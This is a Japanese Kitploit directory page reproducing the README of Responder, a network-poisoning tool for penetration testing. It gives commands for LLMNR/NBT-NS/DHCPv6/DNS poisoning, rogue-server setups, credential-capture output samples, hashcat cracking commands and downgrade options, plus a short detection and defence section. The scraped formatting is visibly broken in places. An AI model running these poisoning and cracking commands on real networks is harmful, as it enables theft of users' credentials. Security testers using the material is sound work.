Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Responder — Responderは、LLMNR、NBT-NS、MDNSポイズナーであり、NTLMv1/NTLMv2/LMv2、拡張セキュリティNTLMSSP、およびBasic HTTP認証をサポートする組み込みのHTTP/SMB/MSSQL/FTP/LDAP不正認証サーバーを備えています。 | Kitploit
ツール/GitHubGitHub/lgandx/responder
パスワードクラッキング偵察パスワード攻撃DNSおよびサブドメイン列挙エクスプロイト横移動情報収集ネットワークセキュリティペネトレーションテスト認証DNSファジングレッドチーミング
6.5k8671203ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
DNS分析
横移動 第7位
パスワード攻撃 第8位
パスワードクラッキング 第6位
GitHublgandx/responder

Responder

Responderは、LLMNR、NBT-NS、MDNSポイズナーであり、NTLMv1/NTLMv2/LMv2、拡張セキュリティNTLMSSP、およびBasic HTTP認証をサポートする組み込みのHTTP/SMB/MSSQL/FTP/LDAP不正認証サーバーを備えています。

リポジトリを見る

Responder

Python Version License

Responder は、LLMNR、NBT-NS、MDNS ポイズナーで、HTTP、SMB、MSSQL、FTP、LDAP、Kerberos、DNS などのための組み込みの不正認証サーバーを備えています。NTLMv1/NTLMv2/LMv2、拡張セキュリティ NTLMSSP、および15以上のプロトコルにわたるさまざまな認証方式をサポートしています。


目次

  • 概要
  • 新機能
  • インストール
  • クイックスタート
  • ネットワークポイズニング
  • 不正サーバー
  • 設定
  • macOS
  • トラブルシューティング

概要

Responderは、LLMNR、NBT-NS、MDNSの名前解決要求に応答して資格情報を取得します。クライアントが存在しないホスト名を解決しようとすると、Responderが応答し、クライアントを攻撃者のマシンに誘導します。そこでは複数の不正認証サーバーが資格情報を取得します。DHCP、DHCPv6の不正サーバーも含まれており、個別に有効化できます。

取得データ:

  • NetNTLMv1/v2ハッシュ - hashcat/johnで解析可能
  • Kerberos AS-REQハッシュ - オフラインクラッキング (hashcat -m 7500)
  • 平文資格情報 - HTTP Basic、FTP、SMTP、IMAP、LDAP、SQLなど
  • チャレンジレスポンス - CRAM-MD5、DIGEST-MD5

新機能

このバージョンには以下が含まれます:

DHCPv6 & DNS の強化

  • ✅ DHCPv6 INFORMATION-REQUEST - Windows 10/11 の完全互換
  • ✅ ドメインフィルタリング - 特定のドメインをターゲット (DHCPv6 & DNS)
  • ✅ ルーターアドバタイズメント - オプションのIPv6ネットワークポイズニング

メールサーバーのアップグレード

  • ✅ SMTP STARTTLS - 最新のメールクライアントからのキャプチャ
  • ✅ IMAP STARTTLS - TLSアップグレード付きポート143
  • ✅ IMAPS - ポート993でのネイティブSSL
  • ✅ 拡張POP3 - 互換性の向上

Kerberosの改善

  • ✅ Force AS-REQ - Kerberos認証を強制します。
  • ✅ Attempt NTLM Fallback - Kerberos認証を取得した後、KDC_ERR_ETYPE_NOSUPPを返します。

プロトコルの拡張

  • ✅ MSSQL - SQL Server認証のキャプチャ
  • ✅ LDAP/LDAPS - ディレクトリサービス資格情報
  • ✅ RDP - リモートデスクトップ認証
  • ✅ WinRM - Windows Remote Management
  • ✅ DCERPC - Windows RPC認証

インストール

必要条件

  • Python 2.7 または Python 3.x
  • Linux (Ubuntu、Kali、Debian推奨)
  • root権限

システム依存関係```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

root@kitploit:~
### Responderのインストール```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

インストールの確認```bash

sudo python3 Responder.py --help

root@kitploit:~
---

## クイックスタート

### 基本的なポイズニング```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 攻撃```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
### HTTP Basic認証の強制```bash
sudo python3 Responder.py -I eth0 -b -v

プロキシ認証 + 不正DHCP を有効にする```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

root@kitploit:~
---

## ネットワークポイズニング

### LLMNR/NBT-NS/MDNS ポイズニング

**目的:** 名前解決の失敗に応答する

**動作の仕組み:**
1. クライアントが存在しないホストに対してブロードキャストクエリを送信
2. レスポンダーが「私がそのホストです」と応答
3. クライアントが攻撃者に接続
4. 資格情報が取得される

**設定:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

使用方法:```bash sudo python3 Responder.py -I eth0 -v

root@kitploit:~
---

### DHCPv6 Server

**目的:** IPv6経由で攻撃者のDNSを使用するようクライアントに強制

**機能:**
- ✅ INFORMATION-REQUEST サポート (Windows 10/11)
- ✅ SOLICIT/REQUEST サポート
- ✅ ドメインフィルタリング (精密なターゲット指定)
- ✅ Router Advertisement (オプション)

**動作原理:**
1. WindowsがDHCPv6 INFORMATION-REQUEST、SOLICIT、REQUESTを送信
2. Responderが応答: DNS = 攻撃者のIPv6
3. WindowsがIPv6 DNSを優先
4. すべてのDNSクエリ → 攻撃者
5. DNSポイズニング → 認証情報の取得

**設定:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

使用法:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
**期待される出力:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

不正サーバ

Responderには17以上の不正認証サーバが含まれています:

ファイルおよびネットワークサービス

SMBサーバ (ポート 445, 139)

目的: ファイル共有からNetNTLMハッシュを取得

機能:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 ハッシュ取得
  • ✅ 拡張セキュリティ NTLMSSP
  • ✅ セッション署名無効(リレーを許可)

トリガー:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

root@kitploit:~
**キャプチャ形式:**```
username::domain:challenge:response:blob

クラッキング:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

root@kitploit:~
**設定:**```ini
[Responder Core]
SMB = On

FTPサーバー(ポート21)

目的: 平文のFTP認証情報をキャプチャ

特徴:

  • ✅ 匿名ログインハニーポット
  • ✅ USER/PASS認証
  • ✅ 平文の認証情報キャプチャ

トリガー:```bash ftp attacker-ip

Username: anything

Password: anything

root@kitploit:~
**取得形式:**```
[FTP] Cleartext: username:password

構成:```ini [Responder Core] FTP = On

root@kitploit:~
---

### データベースサーバー

#### MSSQL Server (ポート 1433)

**目的:** Microsoft SQL Server 認証のキャプチャ

**機能:**
- ✅ SQL Server 認証
- ✅ Windows 認証 (NTLM)
- ✅ 平文の SQL 資格情報
- ✅ NetNTLMv2 ハッシュキャプチャ

**トリガー:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

キャプチャされたフォーマット:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

root@kitploit:~
**設定:**```ini
[Responder Core]
SQL = On

注記:

  • SQL認証とWindows認証の両方をキャプチャします
  • SSMS、sqlcmd、ADO.NET接続で動作します
  • Windows認証を介してドメイン資格情報をキャプチャできます

メールサーバー

SMTPサーバー(ポート25、587)

目的: メールクライアント認証のキャプチャ

機能:

  • ✅ STARTTLS対応(最新クライアント)
  • ✅ AUTH PLAIN(平文)
  • ✅ AUTH LOGIN(平文)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM(NetNTLMv2)

STARTTLSフロー:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅

root@kitploit:~
**トリガー:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

キャプチャされたフォーマット:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response

root@kitploit:~
**設定:**```ini
[Responder Core]
SMTP = On

Certificate Warnings: 自己署名証明書の警告は正常です。クライアントは最初の試行を拒否し、再試行し、成功します。認証情報は依然として取得されます。


IMAPサーバ (ポート143)

目的: STARTTLSを使用したIMAP認証のキャプチャ

機能:

  • ✅ STARTTLSサポート
  • ✅ LOGINコマンド (平文)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

STARTTLSフロー:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅

root@kitploit:~
**設定:**```ini
[Responder Core]
IMAP = On

IMAPSサーバ (Port 993)

目的: IMAP over SSL (ネイティブ暗号化)

機能:

  • ✅ 接続開始時からのネイティブSSL
  • ✅ すべてのIMAP認証方式
  • ✅ STARTTLS不要(すでに暗号化済み)

IMAPとの違い:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start

root@kitploit:~
**設定:**```ini
[Responder Core]
IMAPS = On

POP3 サーバー (ポート 110)

目的: POP3 メール取得認証情報のキャプチャ

機能:

  • ✅ USER/PASS 認証
  • ✅ APOP (MD5 チャレンジ)
  • ✅ 平文認証情報のキャプチャ

トリガー:``` Email client:

  • Protocol: POP3
  • Server: attacker-ip
  • Port: 110
root@kitploit:~
**キャプチャ形式:**```
[POP3] USER: username
[POP3] PASS: password

設定:```ini [Responder Core] POP = On

root@kitploit:~
---

### Webサーバー

#### HTTPサーバー (Port 80)

**目的:** Web認証のキャプチャ

**機能:**
- ✅ NTLM認証 (NetNTLMv1/v2)
- ✅ Basic認証 (平文)
- ✅ Digest認証 (MD5)
- ✅ WPADインジェクション

**トリガー:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

Basic認証の強制:```bash sudo python3 Responder.py -I eth0 -b

root@kitploit:~
**キャプチャされたフォーマット:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

設定:```ini [Responder Core] HTTP = On

root@kitploit:~
---

#### HTTPSサーバー (ポート443)

**目的:** 認証情報をキャプチャするHTTPS

**機能:**
- ✅ SSL/TLS暗号化
- ✅ すべてのHTTP認証方式
- ✅ 自己署名証明書
- ✅ HTTPS経由のWPAD

**設定:**```ini
[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

ディレクトリと認証

Kerberosサーバー(ポート88)

目的: オフラインクラッキングのためにAS-REPハッシュをキャプチャする

特徴:

  • ✅ AES256-CTS-HMAC-SHA1-96 (etype 18)
  • ✅ AES128-CTS-HMAC-SHA1-96 (etype 17)
  • ✅ ARCFOUR-HMAC-MD5 (etype 23)

動作の仕組み:

  1. クライアントがAS-REQ(TGTリクエスト)を送信
  2. Responderが「事前認証が必要」と応答
  3. クライアントが暗号化タイムスタンプ付きのAS-REQを送信
  4. Responderが暗号化タイムスタンプをキャプチャ
  5. hashcatでオフラインクラッキング

クラッキング:```bash hashcat -m 7500 kerberos-asreq.txt wordlist.txt

root@kitploit:~
**設定:**```ini
[Responder Core]
Kerberos = On

LDAPサーバー(ポート389)

目的: LDAPディレクトリ認証のキャプチャ

機能:

  • ✅ シンプル認証(クリアテキスト)
  • ✅ NTLM認証
  • ✅ Active Directoryクエリ

トリガー:```bash

LDAP query

ldapsearch -H ldap://attacker-ip -D "CN=user,DC=corp,DC=local" -w password

Active Directory tools

dsquery user -d attacker-ip

root@kitploit:~
**キャプチャされたフォーマット:**```
[LDAP] Simple: CN=user,DC=corp,DC=local:password
[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob

設定:```ini [Responder Core] LDAP = On

root@kitploit:~
---

#### LDAPSサーバー (ポート636)

**目的:** SSL上のLDAP

**特長:**
- ✅ SSL/TLS暗号化
- ✅ すべてのLDAP認証方式

**設定:**```ini
[Responder Core]
LDAP = On

リモートアクセス

RDPサーバー (ポート3389)

目的: リモートデスクトップ認証の取得

機能:

  • ✅ ネットワークレベル認証 (NLA)
  • ✅ NetNTLMv2 ハッシュのキャプチャ
  • ✅ CredSSP 認証

トリガー:``` Remote Desktop Client:

  • Computer: attacker-ip
  • Username: anything
  • Password: anything
root@kitploit:~
**キャプチャされた形式:**```
[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob

設定:```ini [Responder Core] RDP = On

root@kitploit:~
**注記:** デスクトップセッション前にNLA認証を取得します。

---

#### WinRM サーバー (ポート 5985, 5986)

**目的:** Windows Remote Management の認証情報を取得

**機能:**
- ✅ HTTP (5985) および HTTPS (5986)
- ✅ 基本認証
- ✅ NTLM 認証
- ✅ Kerberos 認証

**トリガー:**```powershell
# PowerShell remoting
Enter-PSSession -ComputerName attacker-ip
Invoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }

# WinRM command line
winrm invoke -remote:http://attacker-ip

キャプチャされた形式:``` [WinRM] Basic: DOMAIN\user:password [WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob

root@kitploit:~
**設定:**```ini
[Responder Core]
WINRM = On

インフラストラクチャ

DNSサーバー (ポート53 TCP/UDP)

目的: ドメインフィルタリング機能を持つ不正DNS

機能:

  • ✅ A/AAAAレコードのポイズニング
  • ✅ MXレコードのポイズニング (メールリダイレクト)
  • ✅ SOAレコード (権威あるように見える)
  • ✅ SRVレコード (Kerberos, LDAP)
  • ✅ SVCB/HTTPSレコード (モダンブラウザ)
  • ✅ EDNS0サポート
  • ✅ ドメインフィルタリング

設定:```ini [DHCPv6 Server] ; DNS uses same domain filter as DHCPv6 DHCPv6_Domain = corp.local

root@kitploit:~
**動作の仕組み:**```
Query: mail.corp.local
Response: 192.168.1.100 (attacker)
Client connects to attacker's SMTP
Credentials captured!

対応するレコードタイプ:

  • A (IPv4) - 攻撃者にリダイレクト
  • AAAA (IPv6) - 攻撃者にリダイレクト
  • MX (Mail) - メールサーバーのポイズニング
  • SRV (Services) - Kerberos, LDAPなど
  • SOA (Authority) - 権威サーバーとして見えるようにする
  • TXT (Text) - SPFレコード
  • SVCB/HTTPS (Service Binding) - モダンブラウザ

ドメインフィルタリングの例:``` DHCPv6_Domain = corp.local

mail.corp.local → POISONED ✅ dc01.corp.local → POISONED ✅ google.com → IGNORED (normal DNS)

root@kitploit:~
**設定:**```ini
[Responder Core]
DNS = On

DCERPCサーバー (ポート135)

目的: Windows RPC認証の取得

特徴:

  • ✅ NTLM認証
  • ✅ Windowsサービスの列挙
  • ✅ NetNTLMv2の取得

トリガー:``` Windows services querying RPC endpoint mapper WMI queries Remote registry access

root@kitploit:~
**キャプチャ形式:**```
[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob

設定:```ini [Responder Core] DCERPC = On

root@kitploit:~
---

## 設定

### メイン設定ファイル

`Responder.conf` を編集してください:```ini
[Responder Core]
; === Network Services ===
SQL = On        # MSSQL (port 1433)
SMB = On        # SMB (ports 445, 139)
RDP = On        # Remote Desktop (port 3389)
Kerberos = On   # Kerberos (port 88)
FTP = On        # FTP (port 21)
POP = On        # POP3 (port 110)
SMTP = On       # SMTP with STARTTLS (port 25/587)
IMAP = On       # IMAP with STARTTLS (port 143)
IMAPS = On      # IMAPS with SSL (port 993)
HTTP = On       # HTTP (port 80)
HTTPS = On      # HTTPS (port 443)
DNS = On        # DNS (port 53)
LDAP = On       # LDAP/LDAPS (ports 389/636)
DCERPC = On     # Windows RPC (port 135)
WINRM = On      # Windows Remote Management (ports 5985/5986)

; === Poisoners ===
LLMNR = On      # Link-Local Multicast Name Resolution
NBTNS = On      # NetBIOS Name Service
MDNS = On       # Multicast DNS
DHCP = Off      # DHCP (IPv4) - use with caution
DHCPv6 = On     # DHCPv6 (IPv6) - use with more caution

; === Settings ===
SessionLog = On
LogToFile = On
Verbose = Yes
Database = Responder.db

; === SSL Certificates ===
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

[HTTP Server]
HtmlFilename = files/AccessDenied.html

[DHCPv6 Server]
; Target specific domain 
DHCPv6_Domain = corp.local

; Send Router Advertisements (use with caution)
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

コマンドラインオプション

基本的な使い方```bash

sudo python3 Responder.py [options]

root@kitploit:~
### Required Arguments

| Option | 説明 |
|--------|-------------|
| `-I eth0, --interface=eth0` | 使用するネットワークインターフェース(すべてのインターフェースを使用するには'ALL') |

### Poisoning Options

| Option | 説明 |
|--------|-------------|
| `-A, --analyze` | 分析モード - 応答せずにNBT-NS、MDNS、LLMNRリクエストを表示 |
| `-w, --wpad` | WPAD不正プロキシサーバーを起動(デフォルト:オフ) |
| `-F, --ForceWpadAuth` | wpad.dat取得時にNTLM/Basic認証を強制(古いネットワーク)|
| `-P, --ProxyAuth` | プロキシにNTLM/Basic認証を強制(非常に効果的) |

### DHCP/DHCPv6 Options

| Option | 説明 |
|--------|-------------|
| `-d, --DHCP` | WPADインジェクションを使用したDHCPブロードキャスト応答を有効化(IPv4) |
| `-D, --DHCP-DNS` | WPADの代わりにDHCP応答にDNSサーバーを注入 |
| `--dhcpv6` | DHCPv6ポイズニングを有効化(SOLICITメッセージに応答) |

### IP poisoning Options

| Option | 説明 |
|--------|-------------|
| `-e 10.0.0.22, --externalip=10.0.0.22` | 別のIPv4アドレスでリクエストをポイズン |
| `-6 ADDR, --externalip6=ADDR` | 別のIPv6アドレスでリクエストをポイズン |
| `-i 10.0.0.21, --ip=10.0.0.21` | 使用するローカルIP(macOSのみ) |

### Authentication Options

| Option | 説明 |
|--------|-------------|
| `-b, --basic` | HTTP Basic認証を返す(デフォルト:NTLM) |
| `--lm` | LMハッシュのダウングレードを強制(Windows XP/2003) |
| `--disable-ess` | 拡張セキュリティNTLMSSPのダウングレードを強制 |

### Advanced Options

| Option | 説明 |
|--------|-------------|
| `-u HOST:PORT, --upstream-proxy=HOST:PORT` | 不正WPAD用の上流HTTPプロキシ |
| `-t 1e, --ttl=1e` | ポイズン応答のWindows TTLを変更(16進数:30s=1e、または'random') |
| `-N NAME, --AnswerName=NAME` | LLMNR応答の正規名(Kerberosリレーに有用) |
| `-E, --ErrorCode` | STATUS_LOGON_FAILUREを返す(WebDAV認証キャプチャを有効化) |

### Output Options

| Option | 説明 |
|--------|-------------|
| `-v, --verbose` | 冗長性を向上(推奨) |
| `-Q, --quiet` | 静音モード - ポイズナーの出力を無効化 |

### Information

| Option | 説明 |
|--------|-------------|
| `--version` | プログラムのバージョンを表示して終了 |
| `-h, --help` | ヘルプメッセージを表示して終了 |

---

### 保存場所```
Responder.db                    # SQLite database
logs/
├── HTTP-NTLMv2-<IP>.txt       # HTTP NetNTLMv2 hashes
├── SMB-NTLMv2-<IP>.txt        # SMB NetNTLMv2 hashes
├── MSSQL-NTLMv2-<IP>.txt      # MSSQL NetNTLMv2 hashes
├── Kerberos-AES-<IP>.txt      # Kerberos AS-REP hashes
├── SMTP-Cleartext-<IP>.txt    # SMTP cleartext credentials
├── IMAP-NTLMv2-<IP>.txt       # IMAP NetNTLMv2 hashes
├── FTP-Cleartext-<IP>.txt     # FTP cleartext credentials
├── LDAP-Cleartext-<IP>.txt    # LDAP cleartext credentials
├── RDP-NTLMv2-<IP>.txt        # RDP NetNTLMv2 hashes
└── WinRM-NTLMv2-<IP>.txt      # WinRM NetNTLMv2 hashes

データベースクエリ```bash

sqlite3 Responder.db

Show tables

.tables

Show all captured hashes

SELECT * FROM hashes;

Export to CSV

.mode csv .output hashes.csv SELECT * FROM hashes; .quit

root@kitploit:~
---

### 運用上の考慮事項

**検知インジケーター:**
- 異常なLLMNR/NBT-NS応答
- 不正なDHCP/DHCPv6サーバー
- 無効なKerberos事前認証要求
- 自己署名SSL証明書
- 複数の認証失敗
- 不審なDNS応答

**防御策:**
- GPO経由でMDNS/LLMNR/NBT-NSを無効化
- スイッチでDHCPスヌーピングを有効化
- IPv6 RAガードを有効化
- DHCPv6ガードを有効化
- 不正なDHCPv6サーバーを監視

---

## macOS

ResponderはmacOSでも動作しますが、ローカルIPアドレスを指定するには`-i`フラグが必要です。macOSは、インターフェースバインドに使用されるLinuxの`SO_BINDTODEVICE`ソケットオプションをサポートしていません。

### ランチャースクリプトの使用

付属の`macOS_Launcher.sh`がサービスの競合を自動的に処理します:```bash
sudo ./macOS_Launcher.sh -I en0

ランチャーは次のことを行います:

  • インターフェースから自動的にIPを検出します(-i を指定して上書き可能)
  • SIPステータスを確認し、制限事項を報告します
  • SIPが無効な場合、競合するmacOSサービス(Kerberos、mDNSResponder、SMB、NetBIOS)を停止します
  • SIPが有効な場合、ポート競合を報告します
  • Responderが終了する際(Ctrl+Cを含む)、停止したすべてのサービスを復元します

直接実行する```bash

Find your IP

ipconfig getifaddr en0

Run with explicit IP

sudo python3 Responder.py -I en0 -i 192.168.1.100

root@kitploit:~
### システム整合性保護 (SIP)

SIPが有効(デフォルト)の場合、macOSはResponderが必要とするポートにバインドするシステムサービスの停止を防ぎます。以下の3つのオプションがあります:

1. **起動スクリプトを使用する** — 競合を報告し、利用可能なもので続行します
2. `Responder.conf` で競合するモジュールを無効にする(例:`SMB = Off`、`DNS = Off`)
3. 完全な機能のために **SIPを無効にする**([Appleのドキュメント](https://developer.apple.com/documentation/security/disabling-and-enabling-system-integrity-protection)を参照)

---

## トラブルシューティング

### よくある問題

**Permission Denied(許可拒否):**```bash
sudo python3 Responder.py -I eth0

インターフェースが見つかりません:```bash ip link show sudo python3 Responder.py -I wlan0

root@kitploit:~
**ポートが既に使用中:**```bash
sudo netstat -tulpn | grep 445
sudo systemctl stop smbd nmbd

DHCPv6が動作しない:```bash

Enable IPv6

sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0

Verify

sysctl net.ipv6.conf.all.disable_ipv6

root@kitploit:~
**ハッシュがキャプチャされていません:**```bash
# Verify servers running
sudo python3 Responder.py -I eth0 -v

# Check firewall
sudo iptables -L

# Monitor traffic
sudo tcpdump -i eth0 port 445 or port 88 or port 389

デバッグモード```bash

Very verbose output

sudo python3 Responder.py -I eth0 -vv

Tail logs

tail -f logs/Responder-Session.log

Network monitoring

sudo tcpdump -i eth0 -w responder-capture.pcap

root@kitploit:~
---

## クレジット

**作者:** Laurent Gaffié
- GitHub: https://github.com/lgandx
- Webサイト: https://secorizon.com/
- Twitter: @secorizon

---

## 寄付
以下のUSDTまたはBitcoinアドレスに寄付することで、このプロジェクトに貢献できます。

USDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A

BTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

Paypal:

https://paypal.me/PythonResponder

---

## 謝辞
Late Responderの開発は、個人や企業からの寄付によって可能になりました。

主要なスポンサーの皆様に感謝いたします:

SecureWorks: https://www.secureworks.com/

Synacktiv: https://www.synacktiv.com/

Black Hills Information Security: http://www.blackhillsinfosec.com/

TrustedSec: https://www.trustedsec.com/

Red Siege Information Security: https://www.redsiege.com/

Open-Sec: http://www.open-sec.com/

そして、このプロジェクトに寄付してくださった世界中のすべての、すべてのペネトレーションテスターの皆様。

ありがとうございます。
ツールをダウンロード